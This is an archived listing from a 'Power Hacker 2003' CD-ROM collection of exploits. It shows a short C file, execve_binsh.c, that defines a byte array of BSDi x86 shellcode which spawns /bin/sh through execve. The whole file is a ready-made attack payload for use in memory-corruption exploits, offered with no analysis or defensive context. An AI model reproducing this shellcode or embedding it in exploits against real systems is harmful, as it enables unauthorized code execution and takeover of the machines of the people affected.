home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / bsdi / execve_binsh.c next >
Encoding:
Text File  |  2000-09-27  |  274 b   |  9 lines

  1. /*
  2.  *  BSDi
  3.  *  execve() of /bin/sh by duke (duke@viper.net.au)
  4.  */
  5.  
  6. char bsdi_shell[]=
  7.   "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
  8.   "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
  9.   "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00";